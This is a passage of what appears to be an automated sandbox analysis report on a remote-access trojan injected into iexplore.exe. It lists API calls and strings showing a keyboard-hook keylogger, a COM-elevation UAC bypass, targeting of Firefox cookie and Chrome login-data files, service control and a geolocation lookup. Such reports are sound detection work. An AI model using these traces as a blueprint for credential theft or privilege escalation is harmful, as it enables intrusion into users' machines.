              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
              • API String ID: 3756808967-1743721670
              • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
              • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
              • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
              • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 0$1$2$3$4$5$6$7$VG
              • API String ID: 0-1861860590
              • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
              • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
              • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
              • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
              • IsValidCodePage.KERNEL32(00000000), ref: 00452777
              • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
              • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
              • String ID: @"a/$lJD$lJD$lJD
              • API String ID: 745075371-2948373
              • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
              • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
              • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
              • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
              APIs
              • _wcslen.LIBCMT ref: 00407521
              • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Object_wcslen
              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • API String ID: 240030777-3166923314
              • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
              • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
              • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
              • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
              APIs
              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
              • GetLastError.KERNEL32 ref: 0041A7BB
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: EnumServicesStatus$ErrorLastManagerOpen
              • String ID:
              • API String ID: 3587775597-0
              • Opcode ID: 753b248cb06240060c6374c2124f03bdf435521c5cd9bb26013a0cc742e0f3d2
              • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
              • Opcode Fuzzy Hash: 753b248cb06240060c6374c2124f03bdf435521c5cd9bb26013a0cc742e0f3d2
              • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
              APIs
              • _free.LIBCMT ref: 00449212
              • _free.LIBCMT ref: 00449236
              • _free.LIBCMT ref: 004493BD
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 00449589
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID: @"a/
              • API String ID: 314583886-2936340451
              • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
              • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
              • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
              • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
              • FindClose.KERNEL32(00000000), ref: 0040C47D
              • FindClose.KERNEL32(00000000), ref: 0040C4A8
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFile$FirstNext
              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
              • API String ID: 1164774033-405221262
              • Opcode ID: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
              • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
              • Opcode Fuzzy Hash: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
              • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
              APIs
              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
              • String ID:
              • API String ID: 2341273852-0
              • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
              • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
              • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
              • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
              APIs
              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$Find$CreateFirstNext
              • String ID: 8SG$PXG$PXG$NG$PG
              • API String ID: 341183262-3812160132
              • Opcode ID: c163e827a49eb4b8ef3b1b841e089ae96758ab6b0a2f13c279a69dd6ef119e1a
              • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
              • Opcode Fuzzy Hash: c163e827a49eb4b8ef3b1b841e089ae96758ab6b0a2f13c279a69dd6ef119e1a
              • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
              • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
              • GetLastError.KERNEL32 ref: 0040A2ED
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
              • TranslateMessage.USER32(?), ref: 0040A34A
              • DispatchMessageA.USER32(?), ref: 0040A355
              Strings
              • Keylogger initialization failure: error , xrefs: 0040A301
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
              • String ID: Keylogger initialization failure: error
              • API String ID: 3219506041-952744263
              • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
              • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
              • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
              • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
              APIs
              • GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
              • GetKeyboardLayout.USER32(00000000), ref: 0040A429
              • GetKeyState.USER32(00000010), ref: 0040A433
              • GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
              • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
              • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
              • String ID:
              • API String ID: 1888522110-0
              • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
              • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
              • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
              • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
              APIs
              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
              • GetProcAddress.KERNEL32(00000000), ref: 00414271
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressCloseCreateLibraryLoadProcsend
              • String ID: SHDeleteKeyW$Shlwapi.dll
              • API String ID: 2127411465-314212984
              • Opcode ID: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
              • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
              • Opcode Fuzzy Hash: 31f50e56d7f4f7f2575dbc53f49883a4967628fc93eddf4b35ee6b86778a76ed
              • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
              • _wcschr.LIBVCRUNTIME ref: 00451E4A
              • _wcschr.LIBVCRUNTIME ref: 00451E58
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
              • String ID: @"a/$sJD
              • API String ID: 4212172061-2077471292
              • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
              • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
              • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
              • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
              APIs
                • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
              • GetProcAddress.KERNEL32(00000000), ref: 00416872
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
              • String ID: !D@$PowrProf.dll$SetSuspendState
              • API String ID: 1589313981-2876530381
              • Opcode ID: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
              • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
              • Opcode Fuzzy Hash: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
              • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
              • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
              • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP$['E
              • API String ID: 2299586839-2532616801
              • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
              • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
              • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
              • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
              APIs
              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
              • InternetCloseHandle.WININET(00000000), ref: 0041B41C
              • InternetCloseHandle.WININET(00000000), ref: 0041B41F
              Strings
              • http://geoplugin.net/json.gp, xrefs: 0041B3B7
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Internet$CloseHandleOpen$FileRead
              • String ID: http://geoplugin.net/json.gp
              • API String ID: 3121278467-91888290
              • Opcode ID: 1fdc9849ae90a53fd03cf2edf4772733314ca127967eac03d135f6bb8277a8f4
              • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
              • Opcode Fuzzy Hash: 1fdc9849ae90a53fd03cf2edf4772733314ca127967eac03d135f6bb8277a8f4
              • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
              • GetLastError.KERNEL32 ref: 0040BA58
              Strings
              • [Chrome StoredLogins not found], xrefs: 0040BA72
              • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
              • UserProfile, xrefs: 0040BA1E
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
              • API String ID: 2018770650-1062637481
              • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
              • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
              • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
              • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
              APIs
              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
              • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
              • GetLastError.KERNEL32 ref: 0041799D
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
              • String ID: SeShutdownPrivilege
              • API String ID: 3534403312-3733053543
              • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
              • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
              • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
              • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
              APIs
              • __EH_prolog.LIBCMT ref: 00409258
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
              • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
              • FindClose.KERNEL32(00000000), ref: 004093C1
                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
              • FindClose.KERNEL32(00000000), ref: 004095B9
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
              • String ID:
              • API String ID: 1824512719-0
              • Opcode ID: d83306c5458867889a4db949950f1e4cf60fc9c917e204586918298b52a37a49
              • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
              • Opcode Fuzzy Hash: d83306c5458867889a4db949950f1e4cf60fc9c917e204586918298b52a37a49
              • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ManagerStart
              • String ID:
              • API String ID: 276877138-0
              • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
              • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
              • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
              • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
              APIs
              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
              • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
              • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
              • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Resource$FindLoadLockSizeof
              • String ID: SETTINGS
              • API String ID: 3473537107-594951305
              • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
              • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
              • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
              • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
              APIs
              • __EH_prolog.LIBCMT ref: 0040966A
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstH_prologNext
              • String ID:
              • API String ID: 1157919129-0
              • Opcode ID: f3eec222462579c493b4b8f660279e06dcf6d29854e56ddc35d6d2e5544d44eb
              • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
